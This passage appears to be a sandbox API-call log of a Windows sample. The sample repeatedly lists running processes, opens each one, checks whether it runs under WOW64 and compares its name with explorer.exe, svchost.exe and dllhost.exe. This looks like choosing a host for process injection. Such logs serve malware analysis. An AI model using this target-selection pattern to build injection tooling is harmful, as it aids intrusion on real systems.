lpString2="dllhost.exe") returned 1 [0239.676] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0239.676] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0239.676] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.676] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.676] CloseHandle (hObject=0xec) returned 1 [0239.676] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0239.676] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0239.676] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0239.676] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0239.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0239.677] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.677] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0239.677] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0239.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0239.678] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.678] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0239.678] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0239.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0239.679] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.679] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0239.679] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.679] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.680] CloseHandle (hObject=0xec) returned 1 [0239.680] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0239.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0239.680] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.680] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.680] CloseHandle (hObject=0xec) returned 1 [0239.680] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0239.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0239.681] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0239.681] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.681] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.681] CloseHandle (hObject=0xec) returned 1 [0239.681] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0239.681] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.682] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0239.682] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.682] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.682] CloseHandle (hObject=0xec) returned 1 [0239.682] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.682] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0239.683] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.683] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0239.683] CloseHandle (hObject=0xec) returned 1 [0239.683] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0239.683] CloseHandle (hObject=0xe8) returned 1 [0239.683] Sleep (dwMilliseconds=0x3e8) [0240.685] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0240.687] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0240.687] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0240.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0240.688] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0240.688] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0240.688] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0240.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0240.689] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0240.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0240.689] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0240.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0240.690] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0240.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0240.690] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0240.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0240.691] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0240.691] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0240.691] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0240.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0240.692] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0240.692] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0240.693] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0240.693] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0240.694] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0240.694] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0240.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0240.695] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0240.695] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0240.696] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0240.696] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0240.696] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.696] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.697] CloseHandle (hObject=0xec) returned 1 [0240.697] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0240.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0240.697] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0240.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0240.698] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.698] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.698] CloseHandle (hObject=0xec) returned 1 [0240.698] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0240.698] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0240.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0240.699] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0240.699] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0240.699] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.699] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.699] CloseHandle (hObject=0xec) returned 1 [0240.699] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0240.699] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0240.699] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0240.699] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0240.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0240.700] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.700] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.700] CloseHandle (hObject=0xec) returned 1 [0240.700] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0240.700] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0240.700] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0240.700] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0240.700] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0240.701] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.701] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.701] CloseHandle (hObject=0xec) returned 1 [0240.701] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0240.701] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0240.701] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0240.701] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0240.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0240.702] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.702] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.702] CloseHandle (hObject=0xec) returned 1 [0240.702] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0240.702] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0240.702] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0240.702] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0240.702] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0240.702] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.702] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.703] CloseHandle (hObject=0xec) returned 1 [0240.703] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0240.703] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0240.703] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0240.703] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0240.703] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0240.703] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.703] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.703] CloseHandle (hObject=0xec) returned 1 [0240.703] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0240.703] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0240.703] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0240.703] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0240.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0240.704] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.704] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.704] CloseHandle (hObject=0xec) returned 1 [0240.704] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0240.704] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0240.704] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0240.704] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0240.704] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0240.704] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.705] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.705] CloseHandle (hObject=0xec) returned 1 [0240.705] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0240.705] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0240.705] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0240.705] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0240.705] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0240.705] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.705] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0240.705] CloseHandle (hObject=0xec) returned 1 [0240.705] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0240.705] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0240.705] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0240.705] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0240.706] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0240.706] IsWow64Process (in: hProcess=0xffffffff, 